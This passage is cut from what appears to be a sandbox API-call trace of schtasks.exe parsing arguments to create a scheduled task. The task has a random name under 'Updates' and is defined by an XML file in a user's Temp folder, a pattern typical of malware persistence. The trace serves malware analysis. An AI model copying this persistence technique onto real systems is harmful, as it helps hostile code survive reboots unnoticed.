dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0305.266] lstrlenW (lpString="?") returned 1 [0305.267] GetThreadLocale () returned 0x409 [0305.267] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0305.267] lstrlenW (lpString="create") returned 6 [0305.267] GetThreadLocale () returned 0x409 [0305.267] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0305.267] lstrlenW (lpString="delete") returned 6 [0305.267] GetThreadLocale () returned 0x409 [0305.267] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0305.267] lstrlenW (lpString="query") returned 5 [0305.267] GetThreadLocale () returned 0x409 [0305.267] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0305.267] lstrlenW (lpString="change") returned 6 [0305.267] GetThreadLocale () returned 0x409 [0305.267] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0305.267] lstrlenW (lpString="run") returned 3 [0305.267] GetThreadLocale () returned 0x409 [0305.267] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0305.267] lstrlenW (lpString="end") returned 3 [0305.267] GetThreadLocale () returned 0x409 [0305.267] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0305.267] lstrlenW (lpString="showsid") returned 7 [0305.267] GetThreadLocale () returned 0x409 [0305.271] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0305.271] RtlRestoreLastWin32Error () returned 0x0 [0305.271] RtlRestoreLastWin32Error () returned 0x0 [0305.271] lstrlenW (lpString="/Create") returned 7 [0305.271] lstrlenW (lpString="-/") returned 2 [0305.271] StrChrIW (lpStart="-/", wMatch=0x5b002f) returned="/" [0305.271] lstrlenW (lpString="?") returned 1 [0305.271] lstrlenW (lpString="?") returned 1 [0305.271] GetProcessHeap () returned 0x5c0000 [0305.271] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0x10) returned 0x5c7900 [0305.271] _memicmp (_Buf1=0x5c7900, _Buf2=0xf52708, _Size=0x7) returned 0 [0305.271] GetProcessHeap () returned 0x5c0000 [0305.271] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0xa) returned 0x5c7948 [0305.272] lstrlenW (lpString="Create") returned 6 [0305.272] GetProcessHeap () returned 0x5c0000 [0305.272] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0x10) returned 0x5c7990 [0305.272] _memicmp (_Buf1=0x5c7990, _Buf2=0xf52708, _Size=0x7) returned 0 [0305.272] GetProcessHeap () returned 0x5c0000 [0305.272] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0x14) returned 0x5c9778 [0305.272] _vsnwprintf (in: _Buffer=0x5c7948, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcf7b8 | out: _Buffer="|?|") returned 3 [0305.272] _vsnwprintf (in: _Buffer=0x5c9778, _BufferCount=0x9, _Format="|%s|", _ArgList=0xcf7b8 | out: _Buffer="|Create|") returned 8 [0305.272] lstrlenW (lpString="|?|") returned 3 [0305.272] lstrlenW (lpString="|Create|") returned 8 [0305.272] RtlRestoreLastWin32Error () returned 0x490 [0305.272] lstrlenW (lpString="create") returned 6 [0305.272] lstrlenW (lpString="create") returned 6 [0305.272] _memicmp (_Buf1=0x5c7900, _Buf2=0xf52708, _Size=0x7) returned 0 [0305.272] GetProcessHeap () returned 0x5c0000 [0305.272] HeapValidate (hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5c7948) returned 1 [0305.272] GetProcessHeap () returned 0x5c0000 [0305.272] RtlReAllocateHeap (Heap=0x5c0000, Flags=0xc, Ptr=0x5c7948, Size=0x14) returned 0x5c98f8 [0305.272] lstrlenW (lpString="Create") returned 6 [0305.272] _memicmp (_Buf1=0x5c7990, _Buf2=0xf52708, _Size=0x7) returned 0 [0305.272] _vsnwprintf (in: _Buffer=0x5c98f8, _BufferCount=0x9, _Format="|%s|", _ArgList=0xcf7b8 | out: _Buffer="|create|") returned 8 [0305.272] _vsnwprintf (in: _Buffer=0x5c9778, _BufferCount=0x9, _Format="|%s|", _ArgList=0xcf7b8 | out: _Buffer="|Create|") returned 8 [0305.272] lstrlenW (lpString="|create|") returned 8 [0305.273] lstrlenW (lpString="|Create|") returned 8 [0305.273] StrStrIW (lpFirst="|create|", lpSrch="|Create|") returned="|create|" [0305.273] RtlRestoreLastWin32Error () returned 0x0 [0305.273] RtlRestoreLastWin32Error () returned 0x0 [0305.273] RtlRestoreLastWin32Error () returned 0x0 [0305.273] lstrlenW (lpString="/TN") returned 3 [0305.273] lstrlenW (lpString="-/") returned 2 [0305.273] StrChrIW (lpStart="-/", wMatch=0x5b002f) returned="/" [0305.273] lstrlenW (lpString="?") returned 1 [0305.273] lstrlenW (lpString="?") returned 1 [0305.273] _memicmp (_Buf1=0x5c7900, _Buf2=0xf52708, _Size=0x7) returned 0 [0305.273] lstrlenW (lpString="TN") returned 2 [0305.273] _memicmp (_Buf1=0x5c7990, _Buf2=0xf52708, _Size=0x7) returned 0 [0305.273] _vsnwprintf (in: _Buffer=0x5c98f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcf7b8 | out: _Buffer="|?|") returned 3 [0305.273] _vsnwprintf (in: _Buffer=0x5c9778, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcf7b8 | out: _Buffer="|TN|") returned 4 [0305.273] lstrlenW (lpString="|?|") returned 3 [0305.273] lstrlenW (lpString="|TN|") returned 4 [0305.273] RtlRestoreLastWin32Error () returned 0x490 [0305.273] lstrlenW (lpString="create") returned 6 [0305.273] lstrlenW (lpString="create") returned 6 [0305.273] _memicmp (_Buf1=0x5c7900, _Buf2=0xf52708, _Size=0x7) returned 0 [0305.274] lstrlenW (lpString="TN") returned 2 [0305.274] _memicmp (_Buf1=0x5c7990, _Buf2=0xf52708, _Size=0x7) returned 0 [0305.274] _vsnwprintf (in: _Buffer=0x5c98f8, _BufferCount=0x9, _Format="|%s|", _ArgList=0xcf7b8 | out: _Buffer="|create|") returned 8 [0305.274] _vsnwprintf (in: _Buffer=0x5c9778, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcf7b8 | out: _Buffer="|TN|") returned 4 [0305.274] lstrlenW (lpString="|create|") returned 8 [0305.274] lstrlenW (lpString="|TN|") returned 4 [0305.274] StrStrIW (lpFirst="|create|", lpSrch="|TN|") returned 0x0 [0305.274] RtlRestoreLastWin32Error () returned 0x490 [0305.274] lstrlenW (lpString="delete") returned 6 [0305.274] lstrlenW (lpString="delete") returned 6 [0305.274] _memicmp (_Buf1=0x5c7900, _Buf2=0xf52708, _Size=0x7) returned 0 [0305.274] lstrlenW (lpString="TN") returned 2 [0305.274] _memicmp (_Buf1=0x5c7990, _Buf2=0xf52708, _Size=0x7) returned 0 [0305.274] _vsnwprintf (in: _Buffer=0x5c98f8, _BufferCount=0x9, _Format="|%s|", _ArgList=0xcf7b8 | out: _Buffer="|delete|") returned 8 [0305.274] _vsnwprintf (in: _Buffer=0x5c9778, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcf7b8 | out: _Buffer="|TN|") returned 4 [0305.274] lstrlenW (lpString="|delete|") returned 8 [0305.274] lstrlenW (lpString="|TN|") returned 4 [0305.274] StrStrIW (lpFirst="|delete|", lpSrch="|TN|") returned 0x0 [0305.274] RtlRestoreLastWin32Error () returned 0x490 [0305.274] lstrlenW (lpString="query") returned 5 [0305.274] lstrlenW (lpString="query") returned 5 [0305.274] _memicmp (_Buf1=0x5c7900, _Buf2=0xf52708, _Size=0x7) returned 0 [0305.274] lstrlenW (lpString="TN") returned 2 [0305.274] _memicmp (_Buf1=0x5c7990, _Buf2=0xf52708, _Size=0x7) returned 0 [0305.275] _vsnwprintf (in: _Buffer=0x5c98f8, _BufferCount=0x8, _Format="|%s|", _ArgList=0xcf7b8 | out: _Buffer="|query|") returned 7 [0305.275] _vsnwprintf (in: _Buffer=0x5c9778, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcf7b8 | out: _Buffer="|TN|") returned 4 [0305.275] lstrlenW (lpString="|query|") returned 7 [0305.275] lstrlenW (lpString="|TN|") returned 4 [0305.275] StrStrIW (lpFirst="|query|", lpSrch="|TN|") returned 0x0 [0305.275] RtlRestoreLastWin32Error () returned 0x490 [0305.275] lstrlenW (lpString="change") returned 6 [0305.275] lstrlenW (lpString="change") returned 6 [0305.275] _memicmp (_Buf1=0x5c7900, _Buf2=0xf52708, _Size=0x7) returned 0 [0305.275] lstrlenW (lpString="TN") returned 2 [0305.275] _memicmp (_Buf1=0x5c7990, _Buf2=0xf52708, _Size=0x7) returned 0 [0305.275] _vsnwprintf (in: _Buffer=0x5c98f8, _BufferCount=0x9, _Format="|%s|", _ArgList=0xcf7b8 | out: _Buffer="|change|") returned 8 [0305.275] _vsnwprintf (in: _Buffer=0x5c9778, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcf7b8 | out: _Buffer="|TN|") returned 4 [0305.275] lstrlenW (lpString="|change|") returned 8 [0305.275] lstrlenW (lpString="|TN|") returned 4 [0305.275] StrStrIW (lpFirst="|change|", lpSrch="|TN|") returned 0x0 [0305.275] RtlRestoreLastWin32Error () returned 0x490 [0305.275] lstrlenW (lpString="run") returned 3 [0305.275] lstrlenW (lpString="run") returned 3 [0305.275] _memicmp (_Buf1=0x5c7900, _Buf2=0xf52708, _Size=0x7) returned 0 [0305.275] lstrlenW (lpString="TN") returned 2 [0305.275] _memicmp (_Buf1=0x5c7990, _Buf2=0xf52708, _Size=0x7) returned 0 [0305.275] _vsnwprintf (in: _Buffer=0x5c98f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xcf7b8 | out: _Buffer="|run|") returned 5 [0305.275] _vsnwprintf (in: _Buffer=0x5c9778, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcf7b8 | out: _Buffer="|TN|") returned 4 [0305.276] lstrlenW (lpString="|run|") returned 5 [0305.276] lstrlenW (lpString="|TN|") returned 4 [0305.276] StrStrIW (lpFirst="|run|", lpSrch="|TN|") returned 0x0 [0305.276] RtlRestoreLastWin32Error () returned 0x490 [0305.276] lstrlenW (lpString="end") returned 3 [0305.276] lstrlenW (lpString="end") returned 3 [0305.276] _memicmp (_Buf1=0x5c7900, _Buf2=0xf52708, _Size=0x7) returned 0 [0305.276] lstrlenW (lpString="TN") returned 2 [0305.276] _memicmp (_Buf1=0x5c7990, _Buf2=0xf52708, _Size=0x7) returned 0 [0305.276] _vsnwprintf (in: _Buffer=0x5c98f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xcf7b8 | out: _Buffer="|end|") returned 5 [0305.276] _vsnwprintf (in: _Buffer=0x5c9778, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcf7b8 | out: _Buffer="|TN|") returned 4 [0305.276] lstrlenW (lpString="|end|") returned 5 [0305.276] lstrlenW (lpString="|TN|") returned 4 [0305.276] StrStrIW (lpFirst="|end|", lpSrch="|TN|") returned 0x0 [0305.276] RtlRestoreLastWin32Error () returned 0x490 [0305.276] lstrlenW (lpString="showsid") returned 7 [0305.276] lstrlenW (lpString="showsid") returned 7 [0305.276] _memicmp (_Buf1=0x5c7900, _Buf2=0xf52708, _Size=0x7) returned 0 [0305.276] GetProcessHeap () returned 0x5c0000 [0305.276] HeapValidate (hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5c98f8) returned 1 [0305.276] GetProcessHeap () returned 0x5c0000 [0305.276] RtlReAllocateHeap (Heap=0x5c0000, Flags=0xc, Ptr=0x5c98f8, Size=0x16) returned 0x5c9678 [0305.276] lstrlenW (lpString="TN") returned 2 [0305.276] _memicmp (_Buf1=0x5c7990, _Buf2=0xf52708, _Size=0x7) returned 0 [0305.277] _vsnwprintf (in: _Buffer=0x5c9678, _BufferCount=0xa, _Format="|%s|", _ArgList=0xcf7b8 | out: _Buffer="|showsid|") returned 9 [0305.277] _vsnwprintf (in: _Buffer=0x5c9778, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcf7b8 | out: _Buffer="|TN|") returned 4 [0305.277] lstrlenW (lpString="|showsid|") returned 9 [0305.277] lstrlenW (lpString="|TN|") returned 4 [0305.277] StrStrIW (lpFirst="|showsid|", lpSrch="|TN|") returned 0x0 [0305.277] RtlRestoreLastWin32Error () returned 0x490 [0305.277] RtlRestoreLastWin32Error () returned 0x490 [0305.277] RtlRestoreLastWin32Error () returned 0x0 [0305.277] lstrlenW (lpString="/TN") returned 3 [0305.277] StrChrIW (lpStart="/TN", wMatch=0x3a) returned 0x0 [0305.277] RtlRestoreLastWin32Error () returned 0x490 [0305.277] RtlRestoreLastWin32Error () returned 0x0 [0305.277] lstrlenW (lpString="/TN") returned 3 [0305.277] GetProcessHeap () returned 0x5c0000 [0305.277] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0x8) returned 0x5c6f20 [0305.277] GetProcessHeap () returned 0x5c0000 [0305.277] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0x14) returned 0x5c96f8 [0305.277] RtlRestoreLastWin32Error () returned 0x0 [0305.277] RtlRestoreLastWin32Error () returned 0x0 [0305.277] lstrlenW (lpString="Updates\\xaFodrmIsC") returned 18 [0305.277] lstrlenW (lpString="-/") returned 2 [0305.277] StrChrIW (lpStart="-/", wMatch=0x5b0055) returned 0x0 [0305.277] RtlRestoreLastWin32Error () returned 0x490 [0305.277] RtlRestoreLastWin32Error () returned 0x490 [0305.277] RtlRestoreLastWin32Error () returned 0x0 [0305.277] lstrlenW (lpString="Updates\\xaFodrmIsC") returned 18 [0305.277] StrChrIW (lpStart="Updates\\xaFodrmIsC", wMatch=0x3a) returned 0x0 [0305.277] RtlRestoreLastWin32Error () returned 0x490 [0305.277] RtlRestoreLastWin32Error () returned 0x0 [0305.277] lstrlenW (lpString="Updates\\xaFodrmIsC") returned 18 [0305.278] GetProcessHeap () returned 0x5c0000 [0305.278] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0x26) returned 0x5c9248 [0305.278] GetProcessHeap () returned 0x5c0000 [0305.278] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0x14) returned 0x5c95f8 [0305.278] RtlRestoreLastWin32Error () returned 0x0 [0305.278] RtlRestoreLastWin32Error () returned 0x0 [0305.278] lstrlenW (lpString="/XML") returned 4 [0305.278] lstrlenW (lpString="-/") returned 2 [0305.278] StrChrIW (lpStart="-/", wMatch=0x5b002f) returned="/" [0305.278] lstrlenW (lpString="?") returned 1 [0305.278] lstrlenW (lpString="?") returned 1 [0305.278] _memicmp (_Buf1=0x5c7900, _Buf2=0xf52708, _Size=0x7) returned 0 [0305.278] lstrlenW (lpString="XML") returned 3 [0305.278] _memicmp (_Buf1=0x5c7990, _Buf2=0xf52708, _Size=0x7) returned 0 [0305.278] _vsnwprintf (in: _Buffer=0x5c9678, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcf7b8 | out: _Buffer="|?|") returned 3 [0305.278] _vsnwprintf (in: _Buffer=0x5c9778, _BufferCount=0x6, _Format="|%s|", _ArgList=0xcf7b8 | out: _Buffer="|XML|") returned 5 [0305.278] lstrlenW (lpString="|?|") returned 3 [0305.278] lstrlenW (lpString="|XML|") returned 5 [0305.278] RtlRestoreLastWin32Error () returned 0x490 [0305.278] lstrlenW (lpString="create") returned 6 [0305.278] lstrlenW (lpString="create") returned 6 [0305.278] _memicmp (_Buf1=0x5c7900, _Buf2=0xf52708, _Size=0x7) returned 0 [0305.278] lstrlenW (lpString="XML") returned 3 [0305.278] _memicmp (_Buf1=0x5c7990, _Buf2=0xf52708, _Size=0x7) returned 0 [0305.279] _vsnwprintf (in: _Buffer=0x5c9678, _BufferCount=0x9, _Format="|%s|", _ArgList=0xcf7b8 | out: _Buffer="|create|") returned 8 [0305.279] _vsnwprintf (in: _Buffer=0x5c9778, _BufferCount=0x6, _Format="|%s|", _ArgList=0xcf7b8 | out: _Buffer="|XML|") returned 5 [0305.279] lstrlenW (lpString="|create|") returned 8 [0305.279] lstrlenW (lpString="|XML|") returned 5 [0305.279] StrStrIW (lpFirst="|create|", lpSrch="|XML|") returned 0x0 [0305.279] RtlRestoreLastWin32Error () returned 0x490 [0305.279] lstrlenW (lpString="delete") returned 6 [0305.279] lstrlenW (lpString="delete") returned 6 [0305.279] _memicmp (_Buf1=0x5c7900, _Buf2=0xf52708, _Size=0x7) returned 0 [0305.279] lstrlenW (lpString="XML") returned 3 [0305.279] _memicmp (_Buf1=0x5c7990, _Buf2=0xf52708, _Size=0x7) returned 0 [0305.279] _vsnwprintf (in: _Buffer=0x5c9678, _BufferCount=0x9, _Format="|%s|", _ArgList=0xcf7b8 | out: _Buffer="|delete|") returned 8 [0305.279] _vsnwprintf (in: _Buffer=0x5c9778, _BufferCount=0x6, _Format="|%s|", _ArgList=0xcf7b8 | out: _Buffer="|XML|") returned 5 [0305.279] lstrlenW (lpString="|delete|") returned 8 [0305.279] lstrlenW (lpString="|XML|") returned 5 [0305.279] StrStrIW (lpFirst="|delete|", lpSrch="|XML|") returned 0x0 [0305.279] RtlRestoreLastWin32Error () returned 0x490 [0305.279] lstrlenW (lpString="query") returned 5 [0305.279] lstrlenW (lpString="query") returned 5 [0305.279] _memicmp (_Buf1=0x5c7900, _Buf2=0xf52708, _Size=0x7) returned 0 [0305.279] lstrlenW (lpString="XML") returned 3 [0305.279] _memicmp (_Buf1=0x5c7990, _Buf2=0xf52708, _Size=0x7) returned 0 [0305.279] _vsnwprintf (in: _Buffer=0x5c9678, _BufferCount=0x8, _Format="|%s|", _ArgList=0xcf7b8 | out: _Buffer="|query|") returned 7 [0305.279] _vsnwprintf (in: _Buffer=0x5c9778, _BufferCount=0x6, _Format="|%s|", _ArgList=0xcf7b8 | out: _Buffer="|XML|") returned 5 [0305.280] lstrlenW (lpString="|query|") returned 7 [0305.280] lstrlenW (lpString="|XML|") returned 5 [0305.280] StrStrIW (lpFirst="|query|", lpSrch="|XML|") returned 0x0 [0305.280] RtlRestoreLastWin32Error () returned 0x490 [0305.280] lstrlenW (lpString="change") returned 6 [0305.280] lstrlenW (lpString="change") returned 6 [0305.280] _memicmp (_Buf1=0x5c7900, _Buf2=0xf52708, _Size=0x7) returned 0 [0305.280] lstrlenW (lpString="XML") returned 3 [0305.280] _memicmp (_Buf1=0x5c7990, _Buf2=0xf52708, _Size=0x7) returned 0 [0305.280] _vsnwprintf (in: _Buffer=0x5c9678, _BufferCount=0x9, _Format="|%s|", _ArgList=0xcf7b8 | out: _Buffer="|change|") returned 8 [0305.280] _vsnwprintf (in: _Buffer=0x5c9778, _BufferCount=0x6, _Format="|%s|", _ArgList=0xcf7b8 | out: _Buffer="|XML|") returned 5 [0305.280] lstrlenW (lpString="|change|") returned 8 [0305.280] lstrlenW (lpString="|XML|") returned 5 [0305.280] StrStrIW (lpFirst="|change|", lpSrch="|XML|") returned 0x0 [0305.280] RtlRestoreLastWin32Error () returned 0x490 [0305.280] lstrlenW (lpString="run") returned 3 [0305.280] lstrlenW (lpString="run") returned 3 [0305.280] _memicmp (_Buf1=0x5c7900, _Buf2=0xf52708, _Size=0x7) returned 0 [0305.280] lstrlenW (lpString="XML") returned 3 [0305.280] _memicmp (_Buf1=0x5c7990, _Buf2=0xf52708, _Size=0x7) returned 0 [0305.280] _vsnwprintf (in: _Buffer=0x5c9678, _BufferCount=0x6, _Format="|%s|", _ArgList=0xcf7b8 | out: _Buffer="|run|") returned 5 [0305.280] _vsnwprintf (in: _Buffer=0x5c9778, _BufferCount=0x6, _Format="|%s|", _ArgList=0xcf7b8 | out: _Buffer="|XML|") returned 5 [0305.280] lstrlenW (lpString="|run|") returned 5 [0305.280] lstrlenW (lpString="|XML|") returned 5 [0305.281] StrStrIW (lpFirst="|run|", lpSrch="|XML|") returned 0x0 [0305.281] RtlRestoreLastWin32Error () returned 0x490 [0305.281] lstrlenW (lpString="end") returned 3 [0305.281] lstrlenW (lpString="end") returned 3 [0305.281] _memicmp (_Buf1=0x5c7900, _Buf2=0xf52708, _Size=0x7) returned 0 [0305.281] lstrlenW (lpString="XML") returned 3 [0305.281] _memicmp (_Buf1=0x5c7990, _Buf2=0xf52708, _Size=0x7) returned 0 [0305.281] _vsnwprintf (in: _Buffer=0x5c9678, _BufferCount=0x6, _Format="|%s|", _ArgList=0xcf7b8 | out: _Buffer="|end|") returned 5 [0305.281] _vsnwprintf (in: _Buffer=0x5c9778, _BufferCount=0x6, _Format="|%s|", _ArgList=0xcf7b8 | out: _Buffer="|XML|") returned 5 [0305.281] lstrlenW (lpString="|end|") returned 5 [0305.281] lstrlenW (lpString="|XML|") returned 5 [0305.281] StrStrIW (lpFirst="|end|", lpSrch="|XML|") returned 0x0 [0305.281] RtlRestoreLastWin32Error () returned 0x490 [0305.281] lstrlenW (lpString="showsid") returned 7 [0305.281] lstrlenW (lpString="showsid") returned 7 [0305.281] _memicmp (_Buf1=0x5c7900, _Buf2=0xf52708, _Size=0x7) returned 0 [0305.281] lstrlenW (lpString="XML") returned 3 [0305.281] _memicmp (_Buf1=0x5c7990, _Buf2=0xf52708, _Size=0x7) returned 0 [0305.281] _vsnwprintf (in: _Buffer=0x5c9678, _BufferCount=0xa, _Format="|%s|", _ArgList=0xcf7b8 | out: _Buffer="|showsid|") returned 9 [0305.281] _vsnwprintf (in: _Buffer=0x5c9778, _BufferCount=0x6, _Format="|%s|", _ArgList=0xcf7b8 | out: _Buffer="|XML|") returned 5 [0305.281] lstrlenW (lpString="|showsid|") returned 9 [0305.281] lstrlenW (lpString="|XML|") returned 5 [0305.281] StrStrIW (lpFirst="|showsid|", lpSrch="|XML|") returned 0x0 [0305.281] RtlRestoreLastWin32Error () returned 0x490 [0305.281] RtlRestoreLastWin32Error () returned 0x490 [0305.281] RtlRestoreLastWin32Error () returned 0x0 [0305.282] lstrlenW (lpString="/XML") returned 4 [0305.282] StrChrIW (lpStart="/XML", wMatch=0x3a) returned 0x0 [0305.282] RtlRestoreLastWin32Error () returned 0x490 [0305.282] RtlRestoreLastWin32Error () returned 0x0 [0305.282] lstrlenW (lpString="/XML") returned 4 [0305.282] GetProcessHeap () returned 0x5c0000 [0305.282] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0xa) returned 0x5c79a8 [0305.282] GetProcessHeap () returned 0x5c0000 [0305.282] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0x14) returned 0x5c97d8 [0305.282] RtlRestoreLastWin32Error () returned 0x0 [0305.282] RtlRestoreLastWin32Error () returned 0x0 [0305.282] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmpB75D.tmp") returned 52 [0305.282] lstrlenW (lpString="-/") returned 2 [0305.282] StrChrIW (lpStart="-/", wMatch=0x5b0043) returned 0x0 [0305.282] RtlRestoreLastWin32Error () returned 0x490 [0305.282] RtlRestoreLastWin32Error () returned 0x490 [0305.282] RtlRestoreLastWin32Error () returned 0x0 [0305.282] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmpB75D.tmp") returned 52 [0305.282] StrChrIW (lpStart="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmpB75D.tmp", wMatch=0x3a) returned=":\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmpB75D.tmp" [0305.282] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmpB75D.tmp") returned 52 [0305.282] GetProcessHeap () returned 0x5c0000 [0305.282] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0x10) returned 0x5c79d8 [0305.282] _memicmp (_Buf1=0x5c79d8, _Buf2=0xf52708, _Size=0x7) returned 0 [0305.282] GetProcessHeap () returned 0x5c0000 [0305.282] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0xc) returned 0x5c7948 [0305.282] GetProcessHeap () returned 0x5c0000 [0305.282] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0x10) returned 0x5ca4c0 [0305.282] _memicmp (_Buf1=0x5ca4c0, _Buf2=0xf52708, _Size=0x7) returned 0 [0305.282] GetProcessHeap () returned 0x5c0000 [0305.282] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0x6e) returned 0x5c6c90 [0305.283] RtlRestoreLastWin32Error () returned 0x7a [0305.283] RtlRestoreLastWin32Error () returned 0x0 [0305.283] RtlRestoreLastWin32Error () returned 0x0 [0305.283] lstrlenW (lpString="C") returned 1 [0305.283] RtlRestoreLastWin32Error () returned 0x490 [0305.283] RtlRestoreLastWin32Error () returned 0x0 [0305.283] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmpB75D.tmp") returned 52 [0305.283] GetProcessHeap () returned 0x5c0000 [0305.283] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0x6a) returned 0x5c6d08 [0305.283] GetProcessHeap () returned 0x5c0000 [0305.283] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0x14) returned 0x5c9618 [0305.283] RtlRestoreLastWin32Error () returned 0x0 [0305.286] GetProcessHeap () returned 0x5c0000 [0305.286] GetProcessHeap () returned 0x5c0000 [0305.286] HeapValidate (hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5c6f20) returned 1 [0305.286] GetProcessHeap () returned 0x5c0000 [0305.286] RtlSizeHeap (HeapHandle=0x5c0000, Flags=0x0, MemoryPointer=0x5c6f20) returned 0x8 [0305.286] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x5c6f20) returned 1 [0305.286] GetProcessHeap () returned 0x5c0000 [0305.286] GetProcessHeap () returned 0x5c0000 [0305.286] HeapValidate (hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5c96f8) returned 1 [0305.286] GetProcessHeap () returned 0x5c0000 [0305.286] RtlSizeHeap (HeapHandle=0x5c0000, Flags=0x0, MemoryPointer=0x5c96f8) returned 0x14 [0305.287] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x5c96f8) returned 1 [0305.287] GetProcessHeap () returned 0x5c0000 [0305.287] GetProcessHeap () returned 0x5c0000 [0305.287] HeapValidate (hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5c9248) returned 1 [0305.287] GetProcessHeap () returned 0x5c0000 [0305.287] RtlSizeHeap (HeapHandle=0x5c0000, Flags=0x0, MemoryPointer=0x5c9248) returned 0x26 [0305.287] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x5c9248) returned 1 [0305.287] GetProcessHeap () returned 0x5c0000 [0305.287] GetProcessHeap () returned 0x5c0000 [0305.287] HeapValidate (hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5c95f8) returned 1 [0305.287] GetProcessHeap () returned 0x5c0000 [0305.287] RtlSizeHeap (HeapHandle=0x5c0000, Flags=0x0, MemoryPointer=0x5c95f8) returned 0x14 [0305.287] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x5c95f8) returned 1 [0305.287] GetProcessHeap () returned 0x5c0000 [0305.287] GetProcessHeap () returned 0x5c0000 [0305.287] HeapValidate (hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5c79a8) returned 1 [0305.287] GetProcessHeap () returned 0x5c0000 [0305.287] RtlSizeHeap (HeapHandle=0x5c0000, Flags=0x0, MemoryPointer=0x5c79a8) returned 0xa [0305.288] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x5c79a8) returned 1 [0305.288] GetProcessHeap () returned 0x5c0000 [0305.288] GetProcessHeap () returned 0x5c0000 [0305.288] HeapValidate (hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5c97d8) returned 1 [0305.288] GetProcessHeap () returned 0x5c0000 [0305.288] RtlSizeHeap (HeapHandle=0x5c0000, Flags=0x0, MemoryPointer=0x5c97d8) returned 0x14 [0305.288] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x5c97d8) returned 1 [0305.288] GetProcessHeap () returned 0x5c0000 [0305.288] GetProcessHeap () returned 0x5c0000 [0305.288] HeapValidate (hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5c6d08) returned 1 [0305.288] GetProcessHeap () returned 0x5c0000 [0305.288] RtlSizeHeap (HeapHandle=0x5c0000, Flags=0x0, MemoryPointer=0x5c6d08) returned 0x6a [0305.288] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x5c6d08) returned 1 [0305.288] GetProcessHeap () returned 0x5c0000 [0305.288] GetProcessHeap () returned 0x5c0000 [0305.288] HeapValidate (hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5c9618) returned 1 [0305.288] GetProcessHeap () returned 0x5c0000 [0305.288] RtlSizeHeap (HeapHandle=0x5c0000, Flags=0x0, MemoryPointer=0x5c9618) returned 0x14 [0305.288] RtlFreeHeap 